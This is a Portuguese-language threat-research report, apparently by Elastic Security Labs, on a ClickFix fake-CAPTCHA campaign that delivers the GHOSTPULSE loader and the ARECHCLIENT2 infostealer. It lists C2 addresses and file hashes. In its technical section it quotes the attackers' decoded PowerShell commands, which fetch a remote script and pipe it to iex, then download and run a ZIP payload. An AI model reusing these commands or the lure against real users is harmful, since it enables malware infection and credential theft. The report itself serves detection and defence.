Preâmbulo
O Elastic Security Labs observou que a técnica ClickFix está ganhando popularidade para campanhas de vários estágios que distribuem vários malwares por meio de táticas de engenharia social.
Nossa inteligência de ameaças indica um aumento substancial na atividade aproveitando o ClickFix (técnica observada pela primeira vez) como um vetor de acesso inicial primário. Essa técnica de engenharia social engana os usuários, fazendo-os copiar e colar o PowerShell malicioso, o que resulta na execução de malware. Nossa telemetria rastreia seu uso desde o ano passado, incluindo instâncias que levaram à implantação de novas versões do carregador GHOSTPULSE. Isso levou a campanhas direcionadas a um público amplo usando malware e infostealers, como LUMMA e ARECHCLIENT2, uma família observada pela primeira vez em 2019 , mas que agora está experimentando um aumento significativo de popularidade.
Esta publicação examina uma campanha recente do ClickFix, fornecendo uma análise aprofundada de seus componentes, das técnicas empregadas e do malware que ela finalmente distribui.
Principais conclusões
- ClickFix: continua sendo um método de acesso inicial altamente eficaz e predominante.
- GHOSTPULSE: Continua a ser amplamente utilizado como um carregador de carga útil de vários estágios, apresentando desenvolvimento contínuo com novos módulos e técnicas de evasão aprimoradas. Notavelmente, sua configuração inicial é entregue em um arquivo criptografado.
- ARECHCLIENT2 (SECTOPRAT): Teve um aumento considerável na atividade maliciosa ao longo de 2025.
O gancho inicial: desconstruindo a engenharia social do ClickFix
Todo ataque bem-sucedido em vários estágios começa com um ponto de apoio e, em muitas campanhas recentes, essa etapa inicial foi satisfeita pelo ClickFix. O ClickFix aproveita a psicologia humana, transformando interações aparentemente inócuas do usuário na própria plataforma de lançamento para concessões.
Em sua essência, o ClickFix é uma técnica de engenharia social projetada para manipular usuários e fazê-los executar inadvertidamente códigos maliciosos em seus sistemas. Ele se aproveita de comportamentos comuns online e tendências psicológicas, apresentando aos usuários avisos enganosos, muitas vezes disfarçados de atualizações do navegador, erros do sistema ou até mesmo verificações de CAPTCHA. O truque é simples, mas incrivelmente eficaz: em vez de um download direto, o usuário é instruído a copiar uma "correção" aparentemente inofensiva (que é um comando malicioso do PowerShell) e colá-la diretamente na caixa de diálogo de execução do sistema operacional. Essa ação aparentemente voluntária ignora muitas defesas de perímetro tradicionais, pois o usuário inicia o processo.
O ClickFix surgiu no cenário de ameaças em março de 2024, mas rapidamente ganhou força, explodindo em prevalência em 2024 e continuando sua ascensão agressiva em 2025. Sua eficácia está na exploração da "fadiga de verificação" — o hábito subconsciente que os usuários desenvolvem de clicar sem pensar nas verificações de segurança. Quando confrontados com um CAPTCHA de aparência familiar ou um botão urgente de "consertar", muitos usuários, condicionados pela rotina, simplesmente atendem sem analisar a solicitação subjacente. Isso torna o ClickFix um vetor de acesso inicial incrivelmente potente, favorecido por um amplo espectro de agentes de ameaças devido à sua alta taxa de sucesso em violar as defesas iniciais.
Nossa recente pesquisa da Elastic Security sobre o EDDIESTEALER fornece outro exemplo concreto da eficácia do ClickFix em facilitar a implantação de malware, destacando ainda mais sua versatilidade e ampla adoção no cenário de ameaças.
Nossa telemetria interna na Elastic corrobora essa tendência, mostrando um volume significativo de alertas relacionados ao ClickFix em nossos ambientes observados, principalmente no primeiro trimestre de 2025. Notamos um aumento nas tentativas em comparação ao trimestre anterior, com foco predominante na implantação de malware de infecção em massa, como RATs e InfoStealers.
A jornada de uma campanha ClickFix até ARECHCLIENT2
A técnica ClickFix geralmente serve como etapa inicial de um ataque maior e em vários estágios. Analisamos recentemente uma campanha que mostra claramente essa progressão. Essa operação começa com uma isca do ClickFix , que engana os usuários e os faz iniciar o processo de infecção. Após obter acesso inicial, a campanha implanta uma versão atualizada do GHOSTPULSE Loader (também conhecido como HIJACKLOADER, IDATLOADER). Este carregador então traz um carregador .NET intermediário. Este estágio adicional é responsável por entregar a carga final: uma amostra ARECHCLIENT2 (SECTOPRAT), carregada diretamente na memória. Esta cadeia de ataque em particular demonstra como os adversários combinam engenharia social com recursos de carregador ocultos e múltiplas camadas de execução para roubar dados e, em última análise, obter controle remoto.
Observamos essa campanha exata em nossa telemetria em , o que nos deu uma visão direta de sua execução no mundo real e da sequência de seus componentes.
Análise técnica da infecção
A cadeia de infecção começa com uma página de phishing que imita uma verificação Captcha anti-DDoS da Cloudflare.
Observamos duas infraestruturas (ambas resolvendo para 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/ e https://clients[.]contology[.]com/captcha/ que entregam a mesma carga inicial.
A interação do usuário nesta página inicia a execução. GHOSTPULSE atua como carregador de malware nesta campanha. O Elastic Security Labs vem monitorando de perto esse carregador, e nossa pesquisa anterior (2023 e 2024) forneceu uma visão detalhada de seus recursos iniciais.
A página da Web é um script JavaScript altamente ofuscado que gera o código HTML e o JavaScript, que copia um comando do PowerShell para a área de transferência.
Ao inspecionar o código HTML de tempo de execução em um navegador, podemos ver o front-end da página, mas não o script que é executado após clicar na caixa de seleção Verify you are human.
Uma solução simples é executá-lo em um depurador para recuperar as informações durante a execução. O segundo código JS é ofuscado, mas podemos facilmente identificar duas funções interessantes. A primeira função, runClickedCheckboxEffects, recupera o endereço IP público da máquina consultando https://api.ipify[.]org?format=json, e então envia o endereço IP para a infraestrutura do invasor, https://koonenmagaziner[.]click/counter/<IP_address>, para registrar a infecção.
A segunda função copia um comando do PowerShell codificado em base64 para a área de transferência.
O que é o seguinte quando é decodificado em base64
(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT'
-UseBasicParsing).content | iexQuando executado, ele busca o seguinte script do PowerShell:
Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile
"$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path
"$env:TEMP/ComponentStyle.zip" -DestinationPath
"$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"O processo de infecção observado para esta campanha envolve a implantação do GHOSTPULSE da seguinte forma: depois que o usuário executa o comando do PowerShell copiado pelo ClickFix, o script inicial busca e executa comandos adicionais. Esses comandos do PowerShell baixam um arquivo ZIP (ComponentStyle.zip) de um local remoto e o extraem para um diretório temporário no sistema da vítima.
O conteúdo extraído inclui componentes para GHOSTPULSE, especificamente um executável benigno (Crysta_X64.exe) e uma biblioteca de vínculo dinâmico maliciosa (DllXDownloadManager.dll). Esta configuração utiliza o carregamento lateral de DLL, uma técnica na qual o executável legítimo carrega a DLL maliciosa. O arquivo (Heeschamjet.rc) é o arquivo IDAT que contém as cargas úteis do próximo estágio em um formato criptografado
e o arquivo Shonomteak.bxi, que é criptografado e usado pelo carregador para buscar o estágio 2 e a estrutura de configuração.
GHOSTPULSE
Estágio 1
GHOSTPULSE é um malware que surgiu em 2023. Ele recebeu continuamente inúmeras atualizações, incluindo uma nova maneira de armazenar sua carga criptografada em uma imagem incorporando a carga nos pixels do PNG, conforme detalhado na postagem do blog de pesquisa da Elastic 2024 e novos módulos da pesquisa da Zscaler.
O malware usado nesta campanha foi enviado com um arquivo criptografado adicional chamado Shonomteak.bxi. Durante o estágio 1 do carregador, ele descriptografa o arquivo usando uma operação de adição DWORD com um valor armazenado no próprio arquivo.
O malware então extrai o código do estágio 2 do arquivo descriptografado Shonomteak.bxi e o injeta em uma biblioteca carregada usando a função LibraryLoadA . O nome da biblioteca é armazenado no mesmo arquivo descriptografado; no nosso caso, é vssapi.dll.
A função stage 2 é então chamada com um parâmetro de estrutura contendo o nome do arquivo PNG do IDAT, a configuração stage 2 que estava dentro do Shonomteak.bxi, descriptografado e um campo booleano b_detect_process definido como True no nosso caso.
Estágio 2
Quando o campo booleano b_detect_process é definido como Verdadeiro, o malware executa uma função que verifica uma lista de processos para ver se eles estão em execução. Se um processo for detectado, a execução será atrasada em 5 segundos.
Em amostras anteriores, analisamos GHOSTPULSE, que teve sua configuração codificada diretamente no binário. Este exemplo, por outro lado, possui todas as informações necessárias para que o malware funcione corretamente, armazenadas em Shonomteak.bxi, , incluindo:
- Hashes para nomes de DLL e APIs do Windows
- Tag IDAT: usada para encontrar o início dos dados criptografados no arquivo PNG
- String IDAT: Que é simplesmente “IDAT”
- Hashes de processos a serem verificados
Considerações finais sobre GHOSTPULSE
GHOSTPULSE recebeu diversas atualizações. O uso do método de cabeçalho IDAT para armazenar a carga criptografada, em vez do novo método que descobrimos em 2024, que utiliza pixels para armazenar a carga, pode indicar que o construtor desta família manteve ambas as opções para compilar novas amostras.
Nosso extrator de configuração realiza extração de carga útil usando ambos os métodos e pode ser usado para análise de massa em amostras. Você pode encontrar a ferramenta atualizada em nosso repositório labs-releases.
ARECHCLIENT2
Em 2025, foi observado um aumento notável na atividade envolvendo ARECHCLIENT2 (SectopRAT). Essa ferramenta de acesso remoto .NET altamente ofuscada, identificada inicialmente em novembro de 2019 e conhecida por seus recursos de roubo de informações, agora está sendo implantada pela GHOSTPULSE por meio da técnica de engenharia social Clickfix. Nossa pesquisa anterior documentou a implantação inicial do GHOSTPULSE utilizando ARECHCLIENT2 por volta de 2023.
A carga útil implantada pelo GHOSTPULSE em um processo recém-criado é um carregador .NET nativo x86, que por sua vez carrega o ARECHCLIENT2.
O carregador passa por 3 etapas:
- Aplicação de patches AMSI
- Extraindo e descriptografando a carga útil
- Carregando o CLR e, em seguida, carregando reflexivamente ARECHCLIENT2
Curiosamente, seu tratamento de erros para fins de depuração ainda está presente, na forma de caixas de mensagens usando a API MessageBoxA , por exemplo, ao não encontrar a seção .tls , uma caixa de mensagem de erro com a string "D1" é exibida.
A seguir está uma tabela com todas as mensagens de erro e suas descrições:
| Message | Descrição |
|---|---|
| F1 | LoadLibraryExW falha na conexão |
| F2 | Falha na aplicação de patch AMSI |
| D1 | Não foi possível encontrar a seção .tls |
| W2 | Falha ao carregar CLR |
O malware configura um gancho na API LoadLibraryExW . Este gancho aguarda que amsi.dll seja carregado e, em seguida, define outro gancho em AmsiScanBuffer 0, ignorando efetivamente o AMSI.
Depois disso, o carregador busca o ponteiro na memória para a seção .tls analisando os cabeçalhos PE. Os primeiros 0x40 bytes desta seção servem como chave XOR, e o restante dos bytes contém a amostra ARECHCLIENT2 criptografada, que o carregador então descriptografa.
Por fim, ele carrega o .NET Common Language Runtime (CLR) na memória com a API do Windows CLRCreateInstance antes de carregar reflexivamente o ARECHCLIENT2. A seguir, um exemplo de como isso é feito.
ARECHCLIENT2 é um potente trojan de acesso remoto e infostealer, projetado para atingir um amplo espectro de dados confidenciais do usuário e informações do sistema. Os principais objetivos do malware se concentram principalmente em:
- Roubo de credenciais e financeiro: o ARECHCLIENT2 tem como alvo específico carteiras de criptomoedas, senhas salvas no navegador, cookies e dados de preenchimento automático. Ele também busca credenciais de FTP, VPN, Telegram, Discord e Steam.
- Criação de perfil e reconhecimento do sistema: o ARECHCLIENT2 reúne detalhes abrangentes do sistema, incluindo a versão do sistema operacional, informações de hardware, endereço IP, nome da máquina e geolocalização (cidade, país e fuso horário).
- Execução de Comandos: O ARECHCLIENT2 recebe e executa comandos de seu servidor de comando e controle (C2), concedendo aos invasores controle remoto sobre os sistemas infectados.
O malware ARECHCLIENT2 se conecta ao seu C2 144.172.97[.]2, que é codificado no binário como uma string criptografada, e também recupera seu IP C2 secundário (143.110.230[.]167) de um link pastebin codificado https://pastebin[.]com/raw/Wg8DHh2x.
Análise de infraestrutura
A página de captcha maliciosa foi hospedada em dois domínios clients.dealeronlinemarketing[.]com e clients.contology[.]com sob o URI /captcha e /Client apontando para o seguinte endereço IP 50.57.243[.]90.
Identificamos que ambas as entidades estão vinculadas a uma agência de publicidade digital com um longo histórico operacional. Investigações posteriores revelam que a empresa tem utilizado consistentemente subdomínios de clientes para hospedar diversos conteúdos, incluindo PDFs e formulários, para fins publicitários.
Avaliamos que o invasor provavelmente comprometeu o servidor 50.57.243[.]90 e está se aproveitando disso para explorar a infraestrutura existente da empresa e o alcance da publicidade para facilitar atividades maliciosas generalizadas.
Mais abaixo na cadeia de ataque, a análise dos IPs C2 do ARECHCLIENT2 (143.110.230[.]167 e 144.172.97[.]2) revelou infraestrutura de campanha adicional. Ambos os servidores estão hospedados em diferentes sistemas autônomos, AS14061 e AS14956.
A análise de um hash de banner compartilhado (@ValidinLLC's HOST-BANNER_0_HASH, que é o valor de hash dos banners de resposta do servidor web) revelou 120 servidores exclusivos em uma variedade de sistemas autônomos nos últimos sete meses. Destes 120, 19 foram previamente rotulados por vários outros fornecedores como “Sectop RAT” (também conhecido como ARECHCLIENT2), conforme documentado no repositório Maltrail.
A execução de validações focadas das ocorrências mais recentes (primeira ocorrência após junho 1, 2025) no VirusTotal mostra que os membros da comunidade rotularam anteriormente todos 13 como Sectop RAT C2.
Todos esses servidores têm configurações semelhantes:
- Executando o Canonical Linux
- SSH ativado
22 - TCP desconhecido ativado
443 - Nginx HTTP em
8080e - HTTP em
9000(porta C2)
O serviço na porta 9000 tem cabeçalhos de servidor Windows, enquanto os serviços HTTP SSH e NGINX especificam o Ubuntu como o sistema operacional. Isso sugere um proxy reverso do C2 para proteger o servidor real, mantendo redirecionadores front-end descartáveis.
COI ARECHCLIENT2:
HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20
Esta é uma campanha ativa, e essa infraestrutura está sendo construída e demolida em ritmo acelerado nos últimos sete meses. No momento da publicação, os seguintes nós C2 ainda estão ativos:
| Value | First Seen | Visto pela última vez |
|---|---|---|
66.63.187.22 | 2025-06-15 | 2025-06-15 |
45.94.47.164 | 2025-06-02 | 2025-06-15 |
84.200.17.129 | 2025-06-04 | 2025-06-15 |
82.117.255.225 | 2025-03-14 | 2025-06-15 |
45.77.154.115 | 2025-06-05 | 2025-06-15 |
144.172.94.120 | 2025-05-20 | 2025-06-15 |
79.124.62.10 | 2025-05-15 | 2025-06-15 |
82.117.242.178 | 2025-03-14 | 2025-06-15 |
195.82.147.132 | 2025-04-10 | 2025-06-15 |
62.60.247.154 | 2025-05-18 | 2025-06-15 |
91.199.163.74 | 2025-04-03 | 2025-06-15 |
172.86.72.81 | 2025-03-13 | 2025-06-15 |
107.189.24.67 | 2025-06-02 | 2025-06-15 |
143.110.230.167 | 2025-06-08 | 2025-06-15 |
185.156.72.80 | 2025-05-15 | 2025-06-15 |
85.158.110.179 | 2025-05-11 | 2025-06-15 |
144.172.101.228 | 2025-05-13 | 2025-06-15 |
192.124.178.244 | 2025-06-01 | 2025-06-15 |
107.189.18.56 | 27/04/2025 | 2025-06-15 |
194.87.29.62 | 2025-05-18 | 2025-06-15 |
185.156.72.63 | 2025-06-12 | 2025-06-12 |
193.149.176.31 | 2025-06-08 | 2025-06-12 |
45.141.87.249 | 2025-06-12 | 2025-06-12 |
176.126.163.56 | 2025-05-06 | 2025-06-12 |
185.156.72.71 | 2025-05-15 | 2025-06-12 |
91.184.242.37 | 2025-05-15 | 2025-06-12 |
45.141.86.159 | 2025-05-15 | 2025-06-12 |
67.220.72.124 | 2025-06-05 | 2025-06-12 |
45.118.248.29 | 28/01/2025 | 2025-06-12 |
172.105.148.233 | 2025-06-03 | 2025-06-10 |
194.26.27.10 | 2025-05-06 | 2025-06-10 |
45.141.87.212 | 2025-06-08 | 2025-06-08 |
45.141.86.149 | 2025-05-15 | 2025-06-08 |
172.235.190.176 | 2025-06-08 | 2025-06-08 |
45.141.86.82 | 2024-12-13 | 2025-06-08 |
45.141.87.7 | 2025-05-13 | 2025-06-06 |
185.125.50.140 | 2025-04-06 | 2025-06-03 |
Conclusão
Esta campanha cibernética de vários estágios aproveita efetivamente a engenharia social do ClickFix para acesso inicial, implantando o carregador GHOSTPULSE para entregar um carregador .NET intermediário, culminando, por fim, no payload ARECHCLIENT2 residente na memória. Essa cadeia de ataque em camadas reúne extensas credenciais, dados financeiros e de sistema, ao mesmo tempo em que concede aos invasores capacidades de controle remoto sobre máquinas comprometidas.
MITRE ATT&CK
A Elastic usa a estrutura MITRE ATT&CK para documentar táticas, técnicas e procedimentos comuns que ameaças persistentes avançadas usam contra redes corporativas.
Táticas
As táticas representam o porquê de uma técnica ou subtécnica. É o objetivo tático do adversário: a razão para executar uma ação.
Técnicas
Técnicas representam como um adversário atinge um objetivo tático executando uma ação.
- Phishing
- Interpretador de comandos e scripts
- Carregamento lateral de DLL
- Carregamento reflexivo
- Interação do usuário
- Transferência de ferramenta de entrada
- Descoberta de informações do sistema
- Descoberta de Processos
- Roubar cookies de sessão Web
Detectando [malware]
Detecção
O Elastic Defend detecta essa ameaça com as seguintes regras de proteção de comportamento:
- Execução suspeita de shell de comando via Windows Run
- Consulta DNS para domínio de nível superior suspeito
- Carga de biblioteca de um arquivo escrito por um proxy binário assinado
- Conexão ao WebService por um Proxy Binário Assinado
- Descoberta potencial de informações do navegador
YARA
Observações
Os seguintes observáveis foram discutidos nesta pesquisa.
| Observável | Tipo | Nome | Referência |
|---|---|---|---|
clients.dealeronlinemarketing[.]com | Domínio | Subdomínio Captcha | |
clients.contology[.]com | Domínio | Subdomínio Captcha | |
koonenmagaziner[.]click | Domínio | ||
50.57.243[.]90 | endereço-ipv4 | clients.dealeronlinemarketing[.]com & clients.contology[.]com endereço IP | |
144.172.97[.]2 | endereço-ipv4 | Servidor C&C ARECHCLIENT2 | |
143.110.230[.]167 | endereço-ipv4 | Servidor C&C ARECHCLIENT2 | |
pastebin[.]com/raw/Wg8DHh2x | endereço-ipv4 | Contém o IP do servidor C&C ARECHCLIENT2 | |
2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a | SHA-256 | DivXDownloadManager.dll | GHOSTPULSE |
a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 | SHA-256 | Heeschamjiet.rc | PNG PULSO FANTASMA |
f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 | SHA-256 | CARREGADOR DOTNET | |
4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 | SHA-256 | ARECHCLIENT2 |
Referências
Os seguintes itens foram referenciados ao longo da pesquisa acima: